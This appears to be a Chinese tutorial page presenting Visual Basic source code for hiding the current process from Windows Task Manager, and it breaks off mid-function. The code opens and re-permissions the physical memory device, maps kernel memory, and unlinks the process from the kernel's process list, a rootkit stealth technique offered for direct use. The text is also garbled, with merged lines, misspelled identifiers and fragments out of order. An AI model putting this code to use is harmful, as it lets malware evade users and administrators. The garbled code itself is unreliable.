vb中如何在任務(wù)管理器里面隱藏應(yīng)用程序進程

1、vb中如何在任務(wù)管理器里面隱藏應(yīng)用程序進程該模塊用于在任務(wù)管理器中隱藏進程Private Const STATUS_INFO_LENGTH_MISMATCH= &H C0000004Private Const STATUS_ACCESS_DENIED= &H C0000022Private Const STATUS_INVA LI D_HANDLE= &H C0000008Private Const ERROR_SUCCESS = 0 &Private Const SECTION_MAP_WRITE= &H2Private Const SECTION_MAP_READ= &H4Private

2、Const READ_CONTROL = & H20000Private Const WRITE_DAC = &H40000Private Const NO_INHERITANCE= 0Private Const DACL_SECURITY_INFORMATION= &H4Private Type IO_STATUS_BLOCKStatus As LongInformation As LongEnd TypePrivate Type UNICODE_STRINGLength As IntegerMaximumLength As IntegerBuffer As LongEnd TypePriv

3、ate Const OBJ INHERIT = &H2&H10=&H40& H200=&H 3F2Private Const OBJ_PERMANENTPrivate Const OBJ_EXCLUSIVE = &H20Private Const OBJ_CASE_INSENSITIVEPrivate Const OBJ_OPENIF = &H80Private Const OBJ_OPENLINK = &H 100Private Const OBJ_KERNEL_HANDLE=Private Const OBJ_VALID_ATTRIBUTESPrivate Type OBJECT_ATTR

4、IBUTESLength As LongRootDirectory As LongObjectName As LongAttributes As LongSecurityDeor As LongSecurityQualityOfService As LongEnd TypePrivate Type ACLAclRevision As ByteSbz1 As ByteAclSize As IntegerAceCount As IntegerSbz2 As IntegerEnd TypePrivate Enum ACCESS_MODENOT_USED_ACCESSGRANT_ACCESSSET_A

5、CCESSDENY_ACCESSREVOKE_ACCESSSET_AUDIT_SUCCESSSET_AUDIT_FAILUREEnd EnumPrivate Enum MULTIPLE_TRUSTEE_OPERATIONNO_MULTIPLE_TRUSTEETRUSTEE_IS_IMPERSONATEEnd EnumPrivate Enum TRUSTEE_FORMTRUSTEE_IS_SIDTRUSTEE_IS_NAMEEnd EnumPrivate Enum TRUSTEE_TYPETRUSTEE_IS_UNKNOWNTRUSTEE_IS_USERTRUSTEE_IS_GROUPEnd E

6、numPrivate Type TRUSTEEpMultipleTrustee As LongMultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATIONTrusteeForm As TRUSTEE_FORMTrusteeType As TRUSTEE_TYPEptstrName As StringEnd TypePrivate Type EXP LI CIT_ACCESS grfAccessPermissions As Long grfAccessMode As ACCESS_MODE grfInheritance As LongTRUSTEE

7、 As TRUSTEEEnd TypePrivate Type AceArrayList () As EXPLICIT_ACCESSEnd TypePrivate Enum SE_OBJECT_TYPESE_UNKNOWN_OBJECT_TYPE = 0 SE_FILE_OBJECTSE_SERVICESE_PRINTERSE_REGISTRY_KEYSE_LMSHARESE_KERNEL_OBJECTSE_WINDOW_OBJECTSE_DS_OBJECTSE_DS_OBJECT_ALLSE_PROVIDER_DEFINED_OBJECTSE_WMIGUID_OBJECTEnd EnumPr

8、ivate Declare Function GetSecurityInfo Libadvapi32.dll(ByVal Handle As Long,ByValAs Long , ppsidGroup As Long,ppDacl As Any , ppSacl As Any,ppSecurityDeor As Long)AsLongPrivate Declare Function SetEntriesInAcl Libadvapi32.dll Alias SetEntriesInAclA(ByVal,pListOfExplicitEntries As,ByVal AccessMode As

9、Private Declare Sub RtlInitUnicodeString LibNTDLL.DLL(DestinationString AsPrivate Declare Function ZwOpenSection LibNTDLL.DLL(SectionHandle As Long,ByValDesiredAccess As Long , ObjectAttributes As Any)As LongPrivate DeclareFunction LocalFree Lib kernel32 (ByVal hMem As Any ) As LongPrivate DeclareFu

10、nction CloseHandle Lib kernel32 (ByVal hObject As Long)As LongPrivate Declare Function SetSecuritylnfo Libadvapi32.dll (ByVal Handle As Long , ByValAs Long , ppsidGroup As Long , ppDacl As Any , ppSacl As Any ) As LongObjectType As SE_OBJECT_TYPE , ByVal SecurityInfo As Long , ppsidOwnercCountOfExpl

11、icitEntries As LongEXP LI CIT_ACCESS , ByVal OldAcl As Long , NewAcl As Long ) As LongPrivate Declare Sub BuildExplicitAccessWithName Libadvapi32.dll AliasBuildExplicitAccessWithNameA(pExplicitAccess As EXPLICIT_ACCESS , ByValpTrusteeName As String , ByVal AccessPermissions As LongACCESS_MODE , ByVa

12、l Inheritance As Long )UNICODE_STRING , ByVal SourceString As Long )Private Declare Function MapViewOfFile Lib kernel32 (ByVal hFileMappingObject As LongObjectType As SE_OBJECT_TYPE,ByVal SecurityInfo As Long,ppsidOwner轉(zhuǎn)載請注名來自愛軟件()阿江編注ByVai dwDesiredAccess As Long,ByVai dwFileOffsetHigh As Long,ByVa

13、ldwFileOffsetLow As Long , ByVal dwNumberOfBytesToMap As Long) As LongPrivate Declare Function UnmapViewOfFile Lib kernel32 (lpBaseAddress As Any ) As LongPrivate Declare Sub CopyMemory Libkernel32 Alias RtlMoveMemory (Destination As AnySource As Any , ByVal Length As Long )Private Declare Function

14、GetVersionEx Lib kernel32 Alias GetVersionExA(IpVersionlnformation As OSVERSIONINFO) As LongPrivate Type OSVERSIONINFOdwOSVersionInfoSize As LongdwMajorVersion As LongdwMinorVersion As LongdwBuildNumber As LongdwPlatformId As LongszCSDVersion As String * 128End TypePrivate verinfo As OSVERSIONINFOPr

15、ivate g_hNtDLL As LongPrivate g_pMapPhysicalMemory As LongPrivate g_hMPM As LongPrivate aByte (3) As BytePublic Sub HideCurrentProcess ()在進程列表中隱藏當(dāng)前應(yīng)用程序進程Dim thread As Long , process As Long , fw As Long , bw As LongDim lOffsetFlink As Long , lOffsetBlink As Long , lOffsetPID As Longverinfo .dwOSVers

16、ionlnfoSize = Len (verinfo )If ( GetVersionEx (verinfo ) 0 ThenIf verinfo .dwPlatformld = 2 ThenIf verinfo .dwMajorVersion = 5 ThenSelect Case verinfo .dwMinorVersionCase 0lOffsetFlink= &HA0lOffsetBlink= &HA4lOffsetPID = &H9CCase 1lOffsetFlink= &H88lOffsetBlink= &H8ClOffsetPID = &H84End SelectEnd If

17、End IfEnd IfIf OpenPhysicalMemory 0 Thenthread = GetData (& HFFDFF124 )process = GetData (thread + &H44 )fw = GetData (process + lOffsetFlink )bw = GetData (process + lOffsetBlink )SetData fw + 4 , bwSetData bw , fwCloseHandle g_hMPMEnd IfEnd SubPrivate Sub SetPhyscialMemorySectionCanBeWrited(ByVai

18、hSection As Long )Dim pDaci As LongDim pNewDaci As LongDim pSD As LongDim dwRes As LongDim ea As EXPLICIT_ACCESSGetSecurityInfo hSection , SE_KERNEL_OBJECT , DACL_SECURITY_INFORMATION , 0 , 0 , pDaci , 0 , pSDea . grfAccessPermissions = SECTION_MAP_WRITEea . grfAccessMode = GRANT_ACCESSea . grfInher

19、itance = NO_INHERITANCEea . TRUSTEE . TrusteeForm = TRUSTEE_IS_NAMEea . TRUSTEE . TrusteeType = TRUSTEE_IS_USERea . TRUSTEE . ptstrName = CURRENT_USER & vbNuilCharSetEntriesInAci 1, ea , pDaci , pNewDaciSetSecurityInfo hSection , SE_KERNEL_OBJECT , DACL_SECURITY_INFORMATION , 0 , 0 ,ByVai pNewDaci ,

20、 0CieanUp :LocaiFree pSDLocalFree pNewDacIEnd Sub轉(zhuǎn)載請注名來自愛軟件() 阿江編注。Private Function OpenPhysicalMemory () As LongDim Status As LongDim PhysmemString As UNICODE_STRINGDim Attributes As OBJECT_ATTRIBUTESRtlInitUnicodeString PhysmemString, StrPtr (DevicePhysicalMemory )Attributes .Length = Len (Attribu

21、tes )Attributes . RootDirectory = 0Attributes . ObjectName = VarPtr (PhysmemString )Attributes .Attributes = 0Attributes . SecurityDeor = 0Attributes . SecurityQualityOfService = 0Status = ZwOpenSection (g_hMPM , SECTION_MAP_READ or SECTION_MAP_WRITEAttributes )If Status = STATUS_ACCESS_DENIED ThenS

22、tatus = ZwOpenSection (g_hMPM , READ_CONTROL or WRITE_DAC , Attributes )SetPhyscialMemorySectionCanBeWrited g_hMPMCloseHandle g_hMPMStatus = ZwOpenSection (g_hMPM , SECTION_MAP_READ or SECTION_MAP_WRITEAttributes )End IfDim lDirectoty As Longverinfo .dwOSVersionlnfoSize=Len (verinfo )If ( GetVersion

23、Ex (verinfo) 0 ThenIf verinfo .dwPlatformld = 2 ThenIf verinfo .dwMajorVersion=5 ThenSelect Case verinfo .dwMinorVersionCase 0lDirectoty= &H30000Case 1lDirectoty= &H39000End SelectEnd IfEnd IfEnd IfIf Status = 0 Theng_pMapPhysicalMemory=MapViewOfFile (g_hMPM , 4, 0 , lDirectoty ，&H1000 )If g_pMapPhy

24、sicalMemory 0 Then OpenPhysicalMemory= g_hMPMEnd IfEnd FunctionPrivate Function LinearToPhys (BaseAddress As Long , addr As Long ) As LongDim VAddr As Long , PGDE As Long , PTE As Long , PAddr As LongDim lTemp As LongVAddr = addrCopyMemory aByte (0), VAddr , 4 lTemp = Fix (ByteArrToLong (aByte )/(2

25、A 22 )PGDE = BaseAddress + ITemp * 4CopyMemory PGDE ,ByVal PGDE , 4If ( PGDE And 1) 0 ThenlTemp = PGDE And&H80If lTemp 0 ThenPAddr = (PGDE And&H FFC00000 ) + (VAddr And&H3FFFFF )ElsePGDE = MapViewOfFile (g_hMPM , 4 , 0 , PGDE And&HFFFFF000 , & H1000 )lTemp = (VAddr And&H3FF000 )/(2 人 12 )PTE = PGDE + lTemp* 4CopyMemory PTE , ByVal PTE , 4If ( PTE And 1 ) 0 ThenPAddr = (PTE And &HFFFFFOOO ) + (VAddr And&HFFF)UnmapViewOfFile PGDEEnd IfEnd IfEnd IfLinearToPhys = PAddrEnd FunctionPrivate Function GetData (addr As Long ) As LongDim phys